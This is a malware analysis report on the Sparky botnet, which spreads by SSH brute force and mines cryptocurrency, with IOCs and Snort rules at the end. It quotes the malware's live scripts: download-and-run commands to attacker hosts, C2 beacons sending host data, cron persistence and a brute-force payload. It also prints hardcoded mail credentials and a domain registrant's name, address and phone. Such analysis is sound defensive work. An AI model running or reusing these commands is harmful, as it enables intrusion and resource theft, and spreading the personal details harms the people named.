Sparky Botnet Analysis Report
1 BackgroundFrequent mining incidents occurred in recent days. Most of the mining incidents were spread through host control devices. However, this incident was not only used to collect mining equipment, but also to expand the scale of botnets. If the latest vulnerability is exploited for spreading, the attack impacts will be much more enormous. The Sparky botnet was spread using SSH brute force cracking to attack LAN users on the discovered zombie hosts. If new zombie hosts are found, the Sparky botnet performs CPU or GPU mining operations based on the capabilities of the zombie hosts. 2 Attack ProcessThe Sparky botnet attack process was analyzed in three aspects: injection, mining, and spreading. 2.1 InjectionIn this sample, malicious scripts were injected to a zombie host. The attacker accessed the user host by SSH brute force cracking and started to execute the downloaded malicious scripts. The IP address of the zombie host was 138.68.160.77. "commands": {
"cd /tmp;wget http://67.205.129.169/.foomin.sh || curl -O
http://www.karaibe.us/.foo/min.sh; chmod +x min.sh; nohup ./min.sh;
./min.sh >> /dev/null &": {
"count": 1,
"IP": [
"138.68.160.77" Victim IP
]
},The min.sh script included the following functions: downloading and executing the mining program, spreading, and getting zombie hosts to register with the C2 server. The address of the C2 server was hxxp://www.karaibe.us/.foo/remote/info.php. Botnet information, such as the IP address of the zombie host and date, was sent. After registration with the C2 server was completed, the zombie host automatically deleted the script. SERVERIP=`curl http://www.karaibe.us/.foo/remote/info.php` curl -d "info=NEWROOT&data=SERVER---> $(whoami)@$SERVERIP <br>DATE---> $(date) <br>ARCH---> $ARCH" http://www.karaibe.us/.foo/remote/info.php > /dev/null cd /tmp rm -rf $0 rm -rf min.sh rm -rf /tmp/min.sh 2.2 MiningCode for mining is as follows: cd /tmp wget http://67.205.129.169/.foo/ryo.tgz || curl -O http://www.karaibe.us/.foo/ryo.tgz || lwp-download http://67.205.129.169/.foo/ryo.tgz tar zxvf ryo.tgz rm -rf ryo.tgz cd .bin nohup ./start > /dev/null & lspci | grep VGA if [ $? -eq 0 ]; then cd /tmp mkdir .x cd /tmp/.x wget http://67.205.129.169/.foo/xmstak.tgz || curl -O http://karaibe.us/.foo/xmstak.tgz tar zxvf xmstak.tgz rm -rf xmstak.tgz cd .xmstak nohup ./start & ./start & fi The zombie host downloaded CPU mining software ryo.tgz from the C2 server and executed the software. If GPU was present, the zombie host continued to download GPU mining software. In ryo.tgz, the zombie host executed the start script for mining, consuming 95% of CPU resources at most. The script was mainly used for mining through the CPU's compute capability. if [ "$ARCH" == "i686" ]; then ./x86/daemon -t $(nproc) -a cryptonight -o pool.ryo.hashvault.pro:5555 -u RYoSrHKVfJiFooGhb4SnN5EFSKWrGZ5v9LZPznSkaYXGhgSaQmKX9dd6xrYrMNQXVcb1VqTgju6aBFtRNkb4VUgVFG9nQPU1iJD -p $(cat .miner) --donate-level 1 --max-cpu-usage 95 -B > /dev/null & elif [ "$ARCH" == "x86_64" ]; then ./h64 -s $hh ./md64 -t $(nproc) -a cryptonight-heavy -o pool.ryo.hashvault.pro:5555 -u RYoSrHKVfJiFooGhb4SnN5EFSKWrGZ5v9LZPznSkaYXGhgSaQmKX9dd6xrYrMNQXVcb1VqTgju6aBFtRNkb4VUgVFG9nQPU1iJD -p $(cat .miner) --donate-level 1 --max-cpu-usage 95 -B > /dev/null & fi The mining pool was pool.ryo.hashvault.pro.
By registering scheduled Linux tasks, zombie hosts registered with the C2 server every 30 minutes so that the C2 server could monitor zombie hosts. In nanor.sh, the Sparky zombie scripts were spread to zombie hosts all the time. mkdir /var/tmp/.nano curl -s http://www.karaibe.us/.foo/nanor.sh > /var/tmp/.nano/nano.sh chmod +x /var/tmp/.nano/nano.sh echo '*/30 * * * * /var/tmp/.nano/nano.sh &> /dev/null @reboot /bin/mkdir /var/tmp/.ssh && /usr/bin/curl -s http://www.karaibe.us/.foo/nanor.sh > /var/tmp/.ssh/nano.sh && /bin/chmod +x /var/tmp/.ssh/nano.sh && /var/tmp/.ssh/nano.sh' > cron.d In xmstak.tgz, the start script made the zombie hosts perform GPU mining and changed the mining pool to 45.77.60.40:5555. Other information remained unchanged. ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmr-stak -o 45.77.60.40:5555 -u RYoSrD2ZsWoSijRyK9bknfSEtuXo9AZjxdCkqiLMNNg63Vy6hjFqL33dQxu5gEmvtx753Wf1n5b4nJgUqGv29nM3EADVsAhgNop -p AGUA-$(cat .miner) --currency sumokoin -r 1 --noCPU > /dev/null & 2.3 SpreadingCode for spreading was as follows: cd .vd wget http://67.205.129.169/.foo/sslm.tgz || curl -O http://www.karaibe.us/.foo/sslm.tgz || lwp-download http://67.205.129.169/.foo/sslm.tgz tar zxvf sslm.tgz rm -rf sslm.tgz cd .sslm nohup ./start > /dev/null & In this sample, sslm.tgz was downloaded and the start script was executed to start a registration task, including setting the date, current directory, processor, and GPU information. "info=HAIDUC-STARTED&data" was a fixed character string in transit and could be extracted as a botnet/Trojan horse/worm rule. After the preceding actions were complete, the sparky.sh script was executed for brute force cracking on 192.168.x.x/255. This network segment was an intranet network, increasing the possibility of brute force cracking successes. #!/bin/bash pwd > dir.dir dir=`cat dir.dir` SERVERIP=`curl http://www.karaibe.us/.foo/remote/info.php --connect-timeout 10` echo "$(whoami)@$SERVERIP DATE--->$(date) SCANDIR: $(pwd) PROCESORS: $(nproc) VIDEO: $(lspci | grep VGA)" > data.file data=`cat data.file` curl -d "info=HAIDUC-STARTED&data=$data" http://www.karaibe.us/.foo/remote/info.php --connect-timeout 10 ./sparky.sh 192.168 ./rand > /dev/null & sleep 20 In sparky.sh, the code for invoking brute force cracking was executed. (The code is as follows.) The main function was to specify the number of threads (300 in the script) and port (port 22 for SSH by default), and execute the password table (varying with the attacked network segment), and attack payload (same as the attack payload this time). passfile=pass threads=300 port=22 SERVERIP=`curl http://www.karaibe.us/.foo/remote/info.php --connect-timeout 10` dir=$(cat dir.dir) curl -s http://www.karaibe.us/.foo/feed/feedp.php --connect-timeout 10 > pass sleep 1 sizepass=$(wc -c < pass) minsizep=6 #daca passfile-ul e mai mic decat 6 biti creaza automat passfile si in cazul in care clasa de scan e localhost baga passfile big if [ ! $sizepass -ge $minsizep ]; then password table cat .classpass > pass elif [ $1 = 192.168 ]; then cat .pass > pass fi ################################## Attack process: number of threads, network segment, port, attack payload ./haiduc $threads -b $1 $passfile $port "cd /tmp;wget http://67.205.129.169/.foo/min.sh || curl -O http://www.karaibe.us/.foo/min.sh; chmod +x min.sh; nohup ./min.sh >> /dev/null &" sleep 3 haiduc is an ELF file. The following information can be obtained after the file is unpacked:
The key code in haiduc is the brute force cracking process. The following figure shows how brute force cracking code is invoked. Once cracking is successful, malicious code is executed on new zombie hosts.
After spreading is complete, finish.php is executed to perform secondary registration with the email C2 server. The detailed information, including the C2 email address hoffmannklaus254@gmail.com and the email sending address tisdialog@tis-dialog.ru, is as follows: $whoami = trim(shell_exec("whoami"));
$IP = shell_exec("curl -s http://www.karaibe.us/.foo/remote/info.php > /dev/null");
$to = "hoffmannklaus254@gmail.com";
$server = "smtp.tis-dialog.ru";
$user = "tisdialog@tis-dialog.ru";
$pass = "tisdialog";
$port = "25";
$letter = file_get_contents($argv[1]);
$letter2 = str_replace("\n", "<BR>", $letter);
$subject = trim($argv[2])." {$whoami}@{$IP}";
if (send($to, $user, $user, $subject, $letter2, $server, $user, $pass, $port)) {
print "OK\n";
} else {
mail($to,$subject,$letter);
}3 Threat Intelligence Tracking3.1 C2 Domain NameThe C2 domain name www.karaibe.us was first registered on September 8, 2018.
The whois information showed that the registered email box was spywebs2009@hotmail.com, Registrant Email: spywebs2009@hotmail.com Registrant Application Purpose: P1 Registrant Nexus Category: C11 Registry Admin ID: C163274B60211452FA3E6D531C1732D56-NSR Admin Name: Beatriz Callau Llopis Admin Organization: Admin Street: Avda Jaime I 51 P05 Admin Street: Admin Street: Admin City: Castellon Admin State/Province: Castellon Admin Postal Code: 12001 Admin Country: ES Admin Phone: +34.697660199 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: spywebs2009@hotmail.com 3.2 Email AddressThe C2 mailbox account hoffmannklaus254@gmail.com and password were specified in code. However, the password had been changed during another access attempt. During the process of finding the password, it was found that the mobile number used by the hacker ended with 33 and the email address used for Gmai registration was spywebs2009@hotmail.com.
The email was sent from tisdialog@tis-dialog.ru, and the password was tisdialog. No email was found after the email box is logged in.
However, a phishing email could be found in other sent emails. 4 Analysis ConclusionThe following conclusions can be drawn after the attack means and threat intelligence tracking are analyzed: 1. Common botnet controllers spread virus by using spam services or other vulnerabilities. The botnet discovered this time is capable of self-spreading, similar to worm spreading. 2. Botnet controllers are also operating other malicious services, such as spam services. Appendix: IOCwww.karaibe.us hoffmannklaus254@gmail.com l Character string indicating zombie hosts online: Info=NEWROOT&data=SERVER---> Snort rules for getting zombie hosts online: flow: established; pkt_data; content: "info|3d|NEWROOT|26|data|3d|SERVER|2d||2d||2d||3e|"; nocase; l Character string for mining by registered zombie host: Info=NEW-MINER-RYO&data=$ Snort rule for mining: flow: established; pkt_data; content: "info|3d|NEW|2d|MINER|2d|RYO|26|data|3d 24|"; nocase; l Character string for starting brute force cracking: Info=HAIDUCSCAN&data= Snort rule for starting brute force cracking: flow: established; pkt_data; content: "info|3d|HAIDUCSCAN|26|data|3d|"; nocase;
|
